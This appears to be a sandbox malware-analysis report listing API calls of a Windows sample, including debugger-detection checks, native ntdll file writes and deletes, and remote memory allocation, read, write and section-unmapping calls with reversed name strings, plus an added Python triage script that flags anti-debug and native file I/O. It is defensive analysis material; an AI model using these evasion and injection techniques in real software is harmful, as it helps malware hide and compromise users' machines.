(graph image omitted; basic blocks recovered from the graph data: 2dcf744-2dcf75e GetModuleHandleW -> 2dcf760-2dcf772 GetProcAddress -> 2dcf774-2dcf784 CheckRemoteDebuggerPresent -> 2dcf786 -> 2dcf78a-2dcf792; each of the first three blocks also has an edge directly to the final block 2dcf78a-2dcf792)
APIs
• GetModuleHandleW.KERNEL32(KernelBase), ref: 02DCF754
• GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02DCF766
• CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02DCF77D
Strings
Memory Dump Source
• Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
• Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2db0000_x.jbxd
Similarity
• API ID: AddressCheckDebuggerHandleModulePresentProcRemote
• String ID: CheckRemoteDebuggerPresent$KernelBase
• API String ID: 35162468-539270669
• Opcode ID: cec2e94142592a12c2dd7f9e72aa349b732e9b0d256a634be7d33d02a3951600
• Instruction ID: c6fe4e68f99ddb53916340240b73276841c45fbf476dc12c0a7533115d8f2313
• Opcode Fuzzy Hash: cec2e94142592a12c2dd7f9e72aa349b732e9b0d256a634be7d33d02a3951600
• Instruction Fuzzy Hash: 77F02E30500348BEEF00A7B488887DCFB6A9B04325F3403E59431732C1E3710A44C690

Control-flow Graph
APIs
  • Part of subcall function 02DB4F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02DB4F2E
• RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02DCDE40), ref: 02DCDDAB
• NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02DCDE40), ref: 02DCDDDB
• NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02DCDDF0
• NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02DCDE1C
• NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02DCDE25
  • Part of subcall function 02DB4C60: SysFreeString.OLEAUT32(02DCF4A4), ref: 02DB4C6E
Memory Dump Source
• Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
• Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2db0000_x.jbxd
Similarity
• API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
• String ID:
• API String ID: 1897104825-0
• Opcode ID: 54339034179ccc9a035226889b930731c1bdac040f31322e9bb20bdddcbb98c0
• Instruction ID: 2694437345eaae88babfce4564356ebd5bd7bc973a0dba559ee95650b3042dc7
• Opcode Fuzzy Hash: 54339034179ccc9a035226889b930731c1bdac040f31322e9bb20bdddcbb98c0
• Instruction Fuzzy Hash: 2221C071A40209BAEB51EAD4CC52FDFB7BEEF48700F500465B601E72C1DAB4AE049B64
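Two of the function entries above are worth turning into triage rules: the anti-debug check that resolves CheckRemoteDebuggerPresent at run time through GetModuleHandleW/GetProcAddress and calls it with FFFFFFFF (the (HANDLE)-1 pseudo-handle for the current process), and the file read performed entirely through ntdll (RtlDosPathNameToNtPathName_U, NtOpenFile, NtQueryInformationFile, NtReadFile, NtClose) rather than the Win32 CreateFile/ReadFile layer that most user-mode hooks watch. The Python below is an added example, not Joe Sandbox output and not code from the sample: it parses the "APIs" lines copied from those two entries, trims each call to its real parameter count, and applies the two rules, decoding the NtOpenFile access mask (FILE_READ_DATA | SYNCHRONIZE) and the FileInformationClass (5 = FileStandardInformation, a 24-byte struct carrying the file size). The arity table and the assumption that stack slots past a prototype's arity are caller stack rather than arguments are this example's own; the module suffixes (.N, .KERNEL32) are kept exactly as the report prints them.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Joe Sandbox "APIs" lines copied from the function entries in this report
# (constructed input for this example: one line per recorded call site).
REPORT_LINES = [
    "• GetModuleHandleW.KERNEL32(KernelBase), ref: 02DCF754",
    "• GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02DCF766",
    "• CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02DCF77D",
    "  • Part of subcall function 02DB4F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02DB4F2E",
    "• RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02DCDE40), ref: 02DCDDAB",
    "• NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02DCDE40), ref: 02DCDDDB",
    "• NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02DCDDF0",
    "• NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02DCDE1C",
    "• NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02DCDE25",
]

# One report line: optional "Part of subcall function X:" prefix, Name.Module(args), ref: ADDR
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<mod>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Assumption of this example: the sandbox prints a fixed run of stack slots, so
# anything past the documented prototype arity is caller stack, not an argument.
ARITY = {
    "GetModuleHandleW": 1, "GetProcAddress": 2, "CheckRemoteDebuggerPresent": 2,
    "RtlDosPathNameToNtPathName_U": 4, "NtOpenFile": 6, "NtCreateFile": 11,
    "NtQueryInformationFile": 5, "NtReadFile": 9, "NtWriteFile": 9, "NtClose": 1,
}

# Windows constants used in the decode (documented values, not taken from the report)
FILE_READ_DATA, FILE_WRITE_DATA, SYNCHRONIZE = 0x1, 0x2, 0x100000
CURRENT_PROCESS_PSEUDO_HANDLE = 0xFFFFFFFF      # (HANDLE)-1 on 32-bit
FILE_STANDARD_INFORMATION_CLASS = 5             # FileStandardInformation


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: str
    subcall_of: Optional[str] = None


def parse_api_lines(lines):
    """Parse report lines into ApiCall records, trimming args to the known arity."""
    calls = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        n = ARITY.get(m["name"])
        calls.append(ApiCall(m["name"], m["mod"], raw[:n] if n else raw, m["ref"], m["sub"]))
    return calls


def hexval(tok):
    """Report slots are unlabelled hex; '?' (not recovered) or a symbol gives None."""
    try:
        return int(tok, 16)
    except ValueError:
        return None


def find_dynamic_antidebug(calls):
    """Rule 1: GetProcAddress resolves CheckRemoteDebuggerPresent, then it is called
    on the current-process pseudo-handle. Returns a finding string or None."""
    resolved = [c.ref for c in calls
                if c.name == "GetProcAddress" and "CheckRemoteDebuggerPresent" in c.args]
    for c in calls:
        if (c.name == "CheckRemoteDebuggerPresent" and resolved
                and hexval(c.args[0]) == CURRENT_PROCESS_PSEUDO_HANDLE):
            return (f"anti-debug: CheckRemoteDebuggerPresent(self) resolved at "
                    f"{resolved[0]}, called at {c.ref}")
    return None


def find_native_file_io(calls):
    """Rule 2: ntdll-only path-convert/open/read-or-write chain. Returns a dict or None."""
    if not any(c.name == "RtlDosPathNameToNtPathName_U" for c in calls):
        return None
    opens = [c for c in calls if c.name in ("NtOpenFile", "NtCreateFile")]
    rw = [c for c in calls if c.name in ("NtReadFile", "NtWriteFile")]
    if not opens or not rw:
        return None
    access = hexval(opens[0].args[1]) or 0          # DesiredAccess is parameter 2 of both
    mode = [n for bit, n in ((FILE_READ_DATA, "read"), (FILE_WRITE_DATA, "write"),
                             (SYNCHRONIZE, "sync")) if access & bit]
    sizes_first = any(c.name == "NtQueryInformationFile"
                      and hexval(c.args[4]) == FILE_STANDARD_INFORMATION_CLASS for c in calls)
    return {"open": opens[0].name, "access": "|".join(mode),
            "ops": [c.name for c in rw], "queries_size_first": sizes_first}


def triage(lines):
    calls = parse_api_lines(lines)
    return {"calls": len(calls), "antidebug": find_dynamic_antidebug(calls),
            "native_file_io": find_native_file_io(calls)}


if __name__ == "__main__":
    for key, value in triage(REPORT_LINES).items():
        print(f"{key}: {value}")
```

Both rules key on function names and decoded argument values, so they survive the module-suffix quirks of the report; what they do not see is the order of calls across functions, which is why rule 1 only fires when the GetProcAddress and the CheckRemoteDebuggerPresent call appear in the same entry.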

Control-flow Graph
APIs
• InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02DCE5F6
Strings
Memory Dump Source
• Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
• Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2db0000_x.jbxd
Similarity
• API ID: CheckConnectionInternet
• String ID: Initialize$OpenSession$ScanBuffer
• API String ID: 3847983778-3852638603
• Opcode ID: 8033487faafb3a5d2ec08cfeb8e173811225bbfebde204306cb3971a888f4afc
• Instruction ID: e24de7b5d6500220666f552e3f9b1ba40b69135a8b48efb650d7983ab2a00e69
• Opcode Fuzzy Hash: 8033487faafb3a5d2ec08cfeb8e173811225bbfebde204306cb3971a888f4afc
• Instruction Fuzzy Hash: FC413275B50149DBEB02FBA4D861EDE73BAEF88700F60442AE042E7342DA34ED058F65

Control-flow Graph
APIs
  • Part of subcall function 02DB4F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02DB4F2E
• RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02DCDD5E), ref: 02DCDCCB
• NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02DCDD05
• NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02DCDD32
• NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02DCDD3B
Memory Dump Source
• Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
• Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3764614163-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 3456edc850cb88f1b0dcb12d47ca89c32f4c70f88cff6ce4a7c54b68beb8875c
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 513941421b298726f561844fb186f0dcb7dddd12c483eaae92771be34516a069
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3456edc850cb88f1b0dcb12d47ca89c32f4c70f88cff6ce4a7c54b68beb8875c
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8521BE71E40209BAEB11EA94DD52FDEB7BEEF08B00F614465B601F72C1D7B47E049A64
APIs
  • Part of subcall function 02DC81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02DC823C,?,?,00000000,?,02DC7A7E,ntdll,00000000,00000000,02DC7AC3,?,?,00000000), ref: 02DC820A
  • Part of subcall function 02DC81CC: GetModuleHandleA.KERNELBASE(?), ref: 02DC821E
  • Part of subcall function 02DC8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02DC82FC,?,?,00000000,00000000,?,02DC8215,00000000,KernelBASE,00000000,00000000,02DC823C), ref: 02DC82C1
  • Part of subcall function 02DC8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DC82C7
  • Part of subcall function 02DC8274: GetProcAddress.KERNEL32(?,?), ref: 02DC82D9
• NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02DC7A9F
Strings
Memory Dump Source
• Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
• Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2db0000_x.jbxd
Similarity
• API ID: HandleModule$AddressProc$AllocateMemoryVirtual
• String ID: ntdll$yromeMlautriVetacollAwZ
• API String ID: 4072585319-445027087
• Opcode ID: 137e456bd95201decd9fcc87b5744defa78e0895d5b9e4c744643bf4c3b1c2e1
• Instruction ID: 2df07b44c566c80b4cae9632fc1c7b6dad4db68063bf48aa11ab57cd83e10d78
• Opcode Fuzzy Hash: 137e456bd95201decd9fcc87b5744defa78e0895d5b9e4c744643bf4c3b1c2e1
• Instruction Fuzzy Hash: 08113975684209BFEB05EFA4EC65EAAB7EDEB48700FA04468B905D7700D630AE40CF74
APIs
  • Part of subcall function 02DC81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02DC823C,?,?,00000000,?,02DC7A7E,ntdll,00000000,00000000,02DC7AC3,?,?,00000000), ref: 02DC820A
  • Part of subcall function 02DC81CC: GetModuleHandleA.KERNELBASE(?), ref: 02DC821E
  • Part of subcall function 02DC8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02DC82FC,?,?,00000000,00000000,?,02DC8215,00000000,KernelBASE,00000000,00000000,02DC823C), ref: 02DC82C1
  • Part of subcall function 02DC8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DC82C7
  • Part of subcall function 02DC8274: GetProcAddress.KERNEL32(?,?), ref: 02DC82D9
• NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02DC7A9F
Strings
Memory Dump Source
• Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
• Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2db0000_x.jbxd
Similarity
• API ID: HandleModule$AddressProc$AllocateMemoryVirtual
• String ID: ntdll$yromeMlautriVetacollAwZ
• API String ID: 4072585319-445027087
• Opcode ID: ed7df32ce6c9724f727ea6d4d4670fe5f86239325615992e00609f7f34089d0d
• Instruction ID: 9e2e1ae365c51e95190fc5a5633d426eee8d6d13f7376d3bad5744a16ee8a05b
• Opcode Fuzzy Hash: ed7df32ce6c9724f727ea6d4d4670fe5f86239325615992e00609f7f34089d0d
• Instruction Fuzzy Hash: 49113975684209BFEB05EFA4EC65E9AB7EDEB48700FA04468B905D7700D630AE40CF74
APIs
  • Part of subcall function 02DC81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02DC823C,?,?,00000000,?,02DC7A7E,ntdll,00000000,00000000,02DC7AC3,?,?,00000000), ref: 02DC820A
  • Part of subcall function 02DC81CC: GetModuleHandleA.KERNELBASE(?), ref: 02DC821E
  • Part of subcall function 02DC8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02DC82FC,?,?,00000000,00000000,?,02DC8215,00000000,KernelBASE,00000000,00000000,02DC823C), ref: 02DC82C1
  • Part of subcall function 02DC8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DC82C7
  • Part of subcall function 02DC8274: GetProcAddress.KERNEL32(?,?), ref: 02DC82D9
• NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02DC8471
Strings
Memory Dump Source
• Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
• Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: HandleModule$AddressProc$MemoryReadVirtual
                                                                                                                                                                                                                                                                                                                                  • String ID: ntdll$yromeMlautriVdaeRtN
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2521977463-737317276
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 0ce2d990a8a6a9c52279316f95568744fca23e58f6ac05f8bba85de21b4f613d
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 629d5515bfd0cff9fd4554da7d7331bfe01ca5ffeac8ea52d14859df33b17452
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0ce2d990a8a6a9c52279316f95568744fca23e58f6ac05f8bba85de21b4f613d
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3A018074684209AFEB02EFA8EC65E9AB7EEEB4C700F614414F905D7700D630AD00DB30
APIs
  • Part of subcall function 02DC81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02DC823C,?,?,00000000,?,02DC7A7E,ntdll,00000000,00000000,02DC7AC3,?,?,00000000), ref: 02DC820A
  • Part of subcall function 02DC81CC: GetModuleHandleA.KERNELBASE(?), ref: 02DC821E
  • Part of subcall function 02DC8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02DC82FC,?,?,00000000,00000000,?,02DC8215,00000000,KernelBASE,00000000,00000000,02DC823C), ref: 02DC82C1
  • Part of subcall function 02DC8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DC82C7
  • Part of subcall function 02DC8274: GetProcAddress.KERNEL32(?,?), ref: 02DC82D9
• NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02DC7DEC
Strings
Memory Dump Source
• Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
• Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2db0000_x.jbxd
Similarity
• API ID: HandleModule$AddressProc$MemoryVirtualWrite
• String ID: Ntdll$yromeMlautriVetirW
• API String ID: 2719805696-3542721025
• Opcode ID: f7af37a6698e30655b33417e3ca3f712d39962519fa1908bb77711c2c9241095
• Instruction ID: e3ed59b85867772b6cd8d4dd904957f2da9dc7645beb0e4c14ab2fcc8e016a6b
• Opcode Fuzzy Hash: f7af37a6698e30655b33417e3ca3f712d39962519fa1908bb77711c2c9241095
• Instruction Fuzzy Hash: 9F0140B568020AAFEB01EF99EC65E9AF7EDEB49700F604854B801D7740D630AD50CF74
APIs
  • Part of subcall function 02DC81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02DC823C,?,?,00000000,?,02DC7A7E,ntdll,00000000,00000000,02DC7AC3,?,?,00000000), ref: 02DC820A
  • Part of subcall function 02DC81CC: GetModuleHandleA.KERNELBASE(?), ref: 02DC821E
  • Part of subcall function 02DC8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02DC82FC,?,?,00000000,00000000,?,02DC8215,00000000,KernelBASE,00000000,00000000,02DC823C), ref: 02DC82C1
  • Part of subcall function 02DC8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DC82C7
  • Part of subcall function 02DC8274: GetProcAddress.KERNEL32(?,?), ref: 02DC82D9
• NtUnmapViewOfSection.NTDLL(?,?), ref: 02DC86D5
Strings
Memory Dump Source
• Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
• Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2db0000_x.jbxd
Similarity
• API ID: HandleModule$AddressProc$SectionUnmapView
• String ID: noitceSfOweiVpamnUtN$ntdll
• API String ID: 3503870465-2520021413
• Opcode ID: c584edda3144755da6c947b32b488d58c02b141cd27134e91fbfc312627441b0
• Instruction ID: 964a13e162509b87be362273d1f0bdf8a80c95c86dce3604ccec8a2795cd8f80
• Opcode Fuzzy Hash: c584edda3144755da6c947b32b488d58c02b141cd27134e91fbfc312627441b0
• Instruction Fuzzy Hash: B9014474680249AFEB06EBA5EC65F9AB7EDEB49700FA14468B401D7740D634AD40DA34
APIs
• RtlI.N(?,?,00000000,02DCDC7E), ref: 02DCDC2C
• RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02DCDC7E), ref: 02DCDC42
• NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02DCDC7E), ref: 02DCDC61
Memory Dump Source
• Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
• Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2db0000_x.jbxd
Similarity
• API ID: Path$DeleteFileNameName_
• String ID:
• API String ID: 4284456518-0
• Opcode ID: fb76ed20a4ca061ad2f4ddb6f4f39f7295996b8d99eac115a353214a6cae732e
• Instruction ID: 74e0f208e970efb42d3488b056b7529f381d65bb66b22385f5e4a8826b4d0861
• Opcode Fuzzy Hash: fb76ed20a4ca061ad2f4ddb6f4f39f7295996b8d99eac115a353214a6cae732e
• Instruction Fuzzy Hash: 81016775944209AEEB06D7A0DD51FCD77BBEF44704F6145B69201E7281DAB4AF048B34
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DB4F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02DB4F2E
                                                                                                                                                                                                                                                                                                                                  • RtlI.N(?,?,00000000,02DCDC7E), ref: 02DCDC2C
                                                                                                                                                                                                                                                                                                                                  • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02DCDC7E), ref: 02DCDC42
                                                                                                                                                                                                                                                                                                                                  • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02DCDC7E), ref: 02DCDC61
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DB4C60: SysFreeString.OLEAUT32(02DCF4A4), ref: 02DB4C6E
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2db0000_x.jbxd
Similarity
• API ID: PathString$AllocDeleteFileFreeNameName_
• String ID:
• API String ID: 1530111750-0
• Opcode ID: 095348d280a0ade78e6ba2a3ffb099574e0866ae451fdcec0a14fdd71b569adb
• Instruction ID: cef00fcc23bac47efc222d678ee22d46645a47888a5c727ca50e2ff59d22cd7a
• Opcode Fuzzy Hash: 095348d280a0ade78e6ba2a3ffb099574e0866ae451fdcec0a14fdd71b569adb
• Instruction Fuzzy Hash: F701F47194020DBEDB11EBA0DD52FCDB3BEEB48700F6145B5E601E3680EA74AF048A74
APIs
  • Part of subcall function 02DC6D6C: CLSIDFromProgID.OLE32(00000000,?,00000000,02DC6DB9,?,?,?,00000000), ref: 02DC6D99
• CoCreateInstance.OLE32(?,00000000,00000005,02DC6EAC,00000000,00000000,02DC6E2B,?,00000000,02DC6E9B), ref: 02DC6E17
Memory Dump Source
• Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
• Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2db0000_x.jbxd
Similarity
• API ID: CreateFromInstanceProg
• String ID:
